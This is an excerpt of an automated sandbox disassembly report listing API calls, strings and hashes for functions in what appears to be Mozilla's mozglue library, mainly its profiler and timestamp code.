                                                                                                      • LoadLibraryW.KERNEL32(user32.dll), ref: 6CFA4644
                                                                                                      • memset.VCRUNTIME140(?,00000000,00000114), ref: 6CFA466D
                                                                                                      • VerSetConditionMask.NTDLL ref: 6CFA469F
                                                                                                      • VerSetConditionMask.NTDLL ref: 6CFA46AB
                                                                                                      • VerSetConditionMask.NTDLL ref: 6CFA46B2
                                                                                                      • VerSetConditionMask.NTDLL ref: 6CFA46B9
                                                                                                      • VerSetConditionMask.NTDLL ref: 6CFA46C0
                                                                                                      • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6CFA46CD
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 6CFA46F1
                                                                                                      • GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6CFA46FD
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
                                                                                                      • String ID: NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
                                                                                                      • API String ID: 1702738223-3894940629
                                                                                                      • Opcode ID: b5b9876cbb97da79a1029d8fd6324eb4d2880daf1920fa9a96ca7ea21d621b70
                                                                                                      • Instruction ID: 10932c0d0faf7270372a384a0cca796d4631af354b603720b853e0900446e7c2
                                                                                                      • Opcode Fuzzy Hash: b5b9876cbb97da79a1029d8fd6324eb4d2880daf1920fa9a96ca7ea21d621b70
                                                                                                      • Instruction Fuzzy Hash: C561C2B1908244EFFB009FE5CC0ABA5BFB8EB46308F048158E5189B691DBB18946CF52
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 6CFD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CFA4A68), ref: 6CFD945E
                                                                                                        • Part of subcall function 6CFD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CFD9470
                                                                                                        • Part of subcall function 6CFD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CFD9482
                                                                                                        • Part of subcall function 6CFD9420: __Init_thread_footer.LIBCMT ref: 6CFD949F
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFDF70E
                                                                                                      • ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6CFDF8F9
                                                                                                        • Part of subcall function 6CFA6390: GetCurrentThreadId.KERNEL32 ref: 6CFA63D0
                                                                                                        • Part of subcall function 6CFA6390: AcquireSRWLockExclusive.KERNEL32 ref: 6CFA63DF
                                                                                                        • Part of subcall function 6CFA6390: ReleaseSRWLockExclusive.KERNEL32 ref: 6CFA640E
                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6D01F4B8), ref: 6CFDF93A
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFDF98A
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFDF990
                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CFDF994
                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CFDF716
                                                                                                        • Part of subcall function 6CFD94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CFD94EE
                                                                                                        • Part of subcall function 6CFD94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CFD9508
                                                                                                        • Part of subcall function 6CF9B5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6CF9B5E0
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFDF739
                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6D01F4B8), ref: 6CFDF746
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFDF793
                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6D01385B,00000002,?,?,?,?,?), ref: 6CFDF829
                                                                                                      • free.MOZGLUE(?,?,00000000,?), ref: 6CFDF84C
                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6CFDF866
                                                                                                      • free.MOZGLUE(?), ref: 6CFDFA0C
                                                                                                        • Part of subcall function 6CFA5E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CFA55E1), ref: 6CFA5E8C
                                                                                                        • Part of subcall function 6CFA5E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CFA5E9D
                                                                                                        • Part of subcall function 6CFA5E60: GetCurrentThreadId.KERNEL32 ref: 6CFA5EAB
                                                                                                        • Part of subcall function 6CFA5E60: GetCurrentThreadId.KERNEL32 ref: 6CFA5EB8
                                                                                                        • Part of subcall function 6CFA5E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CFA5ECF
                                                                                                        • Part of subcall function 6CFA5E60: moz_xmalloc.MOZGLUE(00000024), ref: 6CFA5F27
                                                                                                        • Part of subcall function 6CFA5E60: moz_xmalloc.MOZGLUE(00000004), ref: 6CFA5F47
                                                                                                        • Part of subcall function 6CFA5E60: GetCurrentProcess.KERNEL32 ref: 6CFA5F53
                                                                                                        • Part of subcall function 6CFA5E60: GetCurrentThread.KERNEL32 ref: 6CFA5F5C
                                                                                                        • Part of subcall function 6CFA5E60: GetCurrentProcess.KERNEL32 ref: 6CFA5F66
                                                                                                        • Part of subcall function 6CFA5E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6CFA5F7E
                                                                                                      • free.MOZGLUE(?), ref: 6CFDF9C5
                                                                                                      • free.MOZGLUE(?), ref: 6CFDF9DA
                                                                                                      Strings
                                                                                                      • " attempted to re-register as ", xrefs: 6CFDF858
                                                                                                      • [I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6CFDF9A6
                                                                                                      • Thread , xrefs: 6CFDF789
                                                                                                      • [D %d/%d] profiler_register_thread(%s), xrefs: 6CFDF71F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
                                                                                                      • String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
                                                                                                      • API String ID: 882766088-1834255612
                                                                                                      • Opcode ID: c995e7f7b125777e6ffc2962da696aa11a01b7f613e9a1e91483b6cfc9151773
                                                                                                      • Instruction ID: 5dd02ab0c04d6a35b36fd056f3da45afabdb1fb088b1c1c1d75217c0daf63b04
                                                                                                      • Opcode Fuzzy Hash: c995e7f7b125777e6ffc2962da696aa11a01b7f613e9a1e91483b6cfc9151773
                                                                                                      • Instruction Fuzzy Hash: 1B8113719043009FEB11DFA5CC40BAABBA5EF85308F49452DE8599B751EB30A949CB93
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 6CFD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CFA4A68), ref: 6CFD945E
                                                                                                        • Part of subcall function 6CFD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CFD9470
                                                                                                        • Part of subcall function 6CFD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CFD9482
                                                                                                        • Part of subcall function 6CFD9420: __Init_thread_footer.LIBCMT ref: 6CFD949F
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFDEE60
                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6D01F4B8), ref: 6CFDEE6D
                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6D01F4B8), ref: 6CFDEE92
                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6CFDEEA5
                                                                                                      • CloseHandle.KERNEL32(?), ref: 6CFDEEB4
                                                                                                      • free.MOZGLUE(00000000), ref: 6CFDEEBB
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFDEEC7
                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CFDEECF
                                                                                                        • Part of subcall function 6CFDDE60: GetCurrentThreadId.KERNEL32 ref: 6CFDDE73
                                                                                                        • Part of subcall function 6CFDDE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6CFA4A68), ref: 6CFDDE7B
                                                                                                        • Part of subcall function 6CFDDE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6CFA4A68), ref: 6CFDDEB8
                                                                                                        • Part of subcall function 6CFDDE60: free.MOZGLUE(00000000,?,6CFA4A68), ref: 6CFDDEFE
                                                                                                        • Part of subcall function 6CFDDE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6CFDDF38
                                                                                                        • Part of subcall function 6CFCCBE8: GetCurrentProcess.KERNEL32(?,6CF931A7), ref: 6CFCCBF1
                                                                                                        • Part of subcall function 6CFCCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CF931A7), ref: 6CFCCBFA
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFDEF1E
                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6D01F4B8), ref: 6CFDEF2B
                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6D01F4B8), ref: 6CFDEF59
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFDEFB0
                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6D01F4B8), ref: 6CFDEFBD
                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6D01F4B8), ref: 6CFDEFE1
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFDEFF8
                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CFDF000
                                                                                                        • Part of subcall function 6CFD94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CFD94EE
                                                                                                        • Part of subcall function 6CFD94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CFD9508
                                                                                                      • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6CFDF02F
                                                                                                        • Part of subcall function 6CFDF070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CFDF09B
                                                                                                        • Part of subcall function 6CFDF070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6CFDF0AC
                                                                                                        • Part of subcall function 6CFDF070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6CFDF0BE
                                                                                                      Strings
                                                                                                      • [I %d/%d] profiler_pause, xrefs: 6CFDF008
                                                                                                      • [I %d/%d] profiler_stop, xrefs: 6CFDEED7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
                                                                                                      • String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
                                                                                                      • API String ID: 16519850-1833026159
                                                                                                      • Opcode ID: c6695c5a278b20c64bd4f3580f82d5bd16bae4d0532f2a9725b45961cb0faf78
                                                                                                      • Instruction ID: 53ff84d36d6a8559c1ec504228a1f5bc6e449ffd4d5889003e05182dea30da88
                                                                                                      • Opcode Fuzzy Hash: c6695c5a278b20c64bd4f3580f82d5bd16bae4d0532f2a9725b45961cb0faf78
                                                                                                      • Instruction Fuzzy Hash: 6051E7365042219FEB009BE9DC0A7A67FBCFB47358F1A4519E93983B81DB756804C7A3
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CFA5E9D
                                                                                                        • Part of subcall function 6CFB5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6CFB56EE,?,00000001), ref: 6CFB5B85
                                                                                                        • Part of subcall function 6CFB5B50: EnterCriticalSection.KERNEL32(6D01F688,?,?,?,6CFB56EE,?,00000001), ref: 6CFB5B90
                                                                                                        • Part of subcall function 6CFB5B50: LeaveCriticalSection.KERNEL32(6D01F688,?,?,?,6CFB56EE,?,00000001), ref: 6CFB5BD8
                                                                                                        • Part of subcall function 6CFB5B50: GetTickCount64.KERNEL32 ref: 6CFB5BE4
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFA5EAB
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFA5EB8
                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CFA5ECF
                                                                                                      • memcpy.VCRUNTIME140(00000000,GeckoMain,00000000), ref: 6CFA6017
                                                                                                        • Part of subcall function 6CF94310: moz_xmalloc.MOZGLUE(00000010,?,6CF942D2), ref: 6CF9436A
                                                                                                        • Part of subcall function 6CF94310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6CF942D2), ref: 6CF94387
                                                                                                      • moz_xmalloc.MOZGLUE(00000004), ref: 6CFA5F47
                                                                                                      • GetCurrentProcess.KERNEL32 ref: 6CFA5F53
                                                                                                      • GetCurrentThread.KERNEL32 ref: 6CFA5F5C
                                                                                                      • GetCurrentProcess.KERNEL32 ref: 6CFA5F66
                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6CFA5F7E
                                                                                                      • moz_xmalloc.MOZGLUE(00000024), ref: 6CFA5F27
                                                                                                        • Part of subcall function 6CFACA10: mozalloc_abort.MOZGLUE(?), ref: 6CFACAA2
                                                                                                      • moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CFA55E1), ref: 6CFA5E8C
                                                                                                        • Part of subcall function 6CFACA10: malloc.MOZGLUE(?), ref: 6CFACA26
                                                                                                      • moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CFA55E1), ref: 6CFA605D
                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CFA55E1), ref: 6CFA60CC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
                                                                                                      • String ID: GeckoMain
                                                                                                      • API String ID: 3711609982-966795396
                                                                                                      • Opcode ID: c82c09c73c797af52ce9acd494c705f0705920cad14d452405fe50d1897b04ea
                                                                                                      • Instruction ID: 3aabea07306dc2083978a42830c921c79a13894b79e7ef3bc5d46305220f220f
                                                                                                      • Opcode Fuzzy Hash: c82c09c73c797af52ce9acd494c705f0705920cad14d452405fe50d1897b04ea
                                                                                                      • Instruction Fuzzy Hash: C071ACB1A04740DFD700DFA9C880B6ABBF0BF5A304F14496DE59687B42D731E989CB92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 6CF931C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6CF93217
                                                                                                        • Part of subcall function 6CF931C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6CF93236
                                                                                                        • Part of subcall function 6CF931C0: FreeLibrary.KERNEL32 ref: 6CF9324B
                                                                                                        • Part of subcall function 6CF931C0: __Init_thread_footer.LIBCMT ref: 6CF93260
                                                                                                        • Part of subcall function 6CF931C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6CF9327F
                                                                                                        • Part of subcall function 6CF931C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CF9328E
                                                                                                        • Part of subcall function 6CF931C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CF932AB
                                                                                                        • Part of subcall function 6CF931C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CF932D1
                                                                                                        • Part of subcall function 6CF931C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6CF932E5
                                                                                                        • Part of subcall function 6CF931C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6CF932F7
                                                                                                      • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6CFA9675
                                                                                                      • __Init_thread_footer.LIBCMT ref: 6CFA9697
                                                                                                      • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6CFA96E8
                                                                                                      • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6CFA9707
                                                                                                      • __Init_thread_footer.LIBCMT ref: 6CFA971F
                                                                                                      • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CFA9773
                                                                                                      • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6CFA97B7
                                                                                                      • FreeLibrary.KERNEL32 ref: 6CFA97D0
                                                                                                      • FreeLibrary.KERNEL32 ref: 6CFA97EB
                                                                                                      • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CFA9824
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
                                                                                                      • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                                      • API String ID: 3361784254-3880535382
                                                                                                      • Opcode ID: eb2f1582051ef2ef33b254c3315e916cf2c61d23181bf55941ddf979e843d491
                                                                                                      • Instruction ID: fb323f4c5a00cadd4f6077890555f26f65738f06883c94ac11bdcd2d2cfb0115
                                                                                                      • Opcode Fuzzy Hash: eb2f1582051ef2ef33b254c3315e916cf2c61d23181bf55941ddf979e843d491
                                                                                                      • Instruction Fuzzy Hash: F061C376604201DBDF00CFE5DC85B9ABBF9FB4A314F104229E92993790DB31E955CBA2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • InitializeCriticalSection.KERNEL32(6D01F618), ref: 6CFF6694
                                                                                                      • GetThreadId.KERNEL32(?), ref: 6CFF66B1
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFF66B9
                                                                                                      • memset.VCRUNTIME140(?,00000000,00000100), ref: 6CFF66E1
                                                                                                      • EnterCriticalSection.KERNEL32(6D01F618), ref: 6CFF6734
                                                                                                      • GetCurrentProcess.KERNEL32 ref: 6CFF673A
                                                                                                      • LeaveCriticalSection.KERNEL32(6D01F618), ref: 6CFF676C
                                                                                                      • GetCurrentThread.KERNEL32 ref: 6CFF67FC
                                                                                                      • memset.VCRUNTIME140(?,00000000,000002C8), ref: 6CFF6868
                                                                                                      • RtlCaptureContext.NTDLL ref: 6CFF687F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
                                                                                                      • String ID: WalkStack64
                                                                                                      • API String ID: 2357170935-3499369396
                                                                                                      • Opcode ID: 9a0b954fc703612b338043260b76799a2bb7a6cf0478d13596e1787cc88a46f9
                                                                                                      • Instruction ID: c1ca51abb2ff40f216a6464dafa9c58aa4781ba3d82afe12529dc8583caba755
                                                                                                      • Opcode Fuzzy Hash: 9a0b954fc703612b338043260b76799a2bb7a6cf0478d13596e1787cc88a46f9
                                                                                                      • Instruction Fuzzy Hash: 0D518772909301AFEB11CF64C845B5BBBF4FF8A714F00492DF9A997650DB70A905CB92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 6CFD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CFA4A68), ref: 6CFD945E
                                                                                                        • Part of subcall function 6CFD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CFD9470
                                                                                                        • Part of subcall function 6CFD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CFD9482
                                                                                                        • Part of subcall function 6CFD9420: __Init_thread_footer.LIBCMT ref: 6CFD949F
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFDDE73
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFDDF7D
                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6D01F4B8), ref: 6CFDDF8A
                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6D01F4B8), ref: 6CFDDFC9
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFDDFF7
                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CFDE000
                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6CFA4A68), ref: 6CFDDE7B
                                                                                                        • Part of subcall function 6CFD94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CFD94EE
                                                                                                        • Part of subcall function 6CFD94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CFD9508
                                                                                                        • Part of subcall function 6CFCCBE8: GetCurrentProcess.KERNEL32(?,6CF931A7), ref: 6CFCCBF1
                                                                                                        • Part of subcall function 6CFCCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CF931A7), ref: 6CFCCBFA
                                                                                                      • ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6CFA4A68), ref: 6CFDDEB8
                                                                                                      • free.MOZGLUE(00000000,?,6CFA4A68), ref: 6CFDDEFE
                                                                                                      • ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6CFDDF38
                                                                                                      Strings
                                                                                                      • [I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6CFDE00E
                                                                                                      • [I %d/%d] locked_profiler_stop, xrefs: 6CFDDE83
                                                                                                      • <none>, xrefs: 6CFDDFD7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
